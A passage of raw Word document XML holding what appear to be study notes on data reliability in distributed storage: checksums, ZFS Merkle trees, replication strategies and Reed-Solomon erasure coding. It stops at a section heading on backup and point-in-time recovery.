    <w:p w14:paraId="071DCAED" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Compare: if mismatch → corruption detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFE8BB7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens after detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C42A5FF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If the data is replicated: fetch a correct copy from another replica. Transparent to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E72285" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If no replica: return an error. Better than silently returning wrong data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65241DF5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ZFS's approach (end-to-end checksumming):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359E3172" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every block in the filesystem has a checksum stored in its PARENT block's pointer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DBBC68" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Forms a Merkle tree (hash tree) from root to leaves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D79B06" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Corruption anywhere in the tree is detected by the parent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62632CB0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Combined with mirroring/RAID-Z: corrupted blocks are automatically healed from good copies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B65147" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Application-level checksums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A58D581" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>S3 stores MD5/SHA-256 of every object. On retrieval, the checksum is verified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D037EFE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Kafka stores CRC32 per message. Consumers verify on read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2BBAE6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>gRPC optionally includes CRC in its framing for wire corruption detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE0796" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Replication for Data Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7165CCE5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single-machine durability is insufficient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6972715D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Even with WAL, checksums, and ECC RAM — a house fire destroys the machine. All data gone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6673E682" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication strategies for reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075EEE62" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronous replication (strongest durability guarantee):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEBE151" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Write arrives at primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772FD7B5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Primary writes to local WAL + sends to replica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173418E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Replica writes to ITS WAL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA68F5F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Replica acknowledges to primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6FE7D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Primary acknowledges to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDD196" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If the client received acknowledgment, the data exists on at least 2 physically separate machines. Any single machine failure preserves the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498E289B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Every write pays the latency of the slowest replica. If replica is in another datacenter (50ms away), every write takes ≥50ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8963A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quorum writes (balancing durability and performance):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6819B1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>With N=5 replicas, W=3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE876B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Write to 3 out of 5 replicas before acknowledging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8E1832" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Can tolerate 2 simultaneous disk failures without data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543079D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Can tolerate 1 failure without any write disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7787D684" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Faster than full synchronous (only wait for 3, not 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313D86E8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain replication (strong consistency, high throughput):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D3CFD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Writes go to the HEAD of a chain: A → B → C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C96D0F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>A writes locally, forwards to B. B writes locally, forwards to C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F69A64C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>C (the TAIL) acknowledges to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731DA73E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reads go to the TAIL (which has the latest committed data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A5FC78" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantee:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> If the tail acknowledged, all replicas in the chain have the data. </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantage over quorum:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Higher throughput (writes pipeline through the chain). Strong consistency (read from tail = always latest). </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Higher latency for writes (must traverse entire chain). Any node failure requires chain reconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D366AE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 Erasure Coding — Space-Efficient Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4616E7F1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem with replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CCF45F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>3x replication means 3x storage cost. For petabytes of data, this is enormously expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7C8F7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How erasure coding works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6775674C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Take K data chunks. Encode them into N total chunks (N &gt; K) using mathematical coding (Reed-Solomon). Any K out of N chunks can reconstruct the original data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08B7F6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example — RS(10,4):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F861AAE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>10 data chunks + 4 parity chunks = 14 total chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BA5588" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Can lose ANY 4 chunks and still recover all data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157037D2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="425"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Storage overhead: 14/10 = 1.4x (vs 3x for triple replication).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1A3EF8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes of reconstruction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EE751A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>If 2 chunks are lost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510F4B73" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Read any 10 of the remaining 12 chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CE4EEC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Apply the inverse of the encoding matrix (Galois Field arithmetic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB68CE6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Recover the original 10 data chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2948333D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Re-encode to regenerate the missing chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E28346" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tradeoff vs. replication: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332"/>
        <w:gridCol w:w="2438"/>
        <w:gridCol w:w="3583"/>
      </w:tblGrid>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="255849F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D305A5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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8C7664" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3x Replication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A6A016" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>RS(10,4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="2B2C49E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19E6F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Storage overhead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BD6219" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>3x</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693BEA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>1.4x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="337CC65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1B670D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:lastRenderedPageBreak/>
              <w:t>Fault tolerance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4D328A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>2 failures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98C9A6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>4 failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="4585025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D1B3B2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Read performance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E7A76F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Any 1 replica (fast)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0EF2CA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Need K chunks (slower)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="22795F4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B72D48" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Write performance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50D1B1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Write 3 copies (fast)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891F0F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Encode + write 14 chunks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="3A283AC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495DC5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Repair cost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9F17C6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Copy 1 chunk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5FCC2B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Read K chunks, compute, write</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3464B89E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> HDFS (optional erasure coding policy), Google Colossus, Azure Storage, Ceph.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B5FB1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to use which:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A62B80F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Hot data (frequently accessed): Replication (fast reads).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BD81D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Warm/cold data (rarely accessed): Erasure coding (cost-efficient durability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADEA103" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.6 Backup and Point-in-Time Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3A6B6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
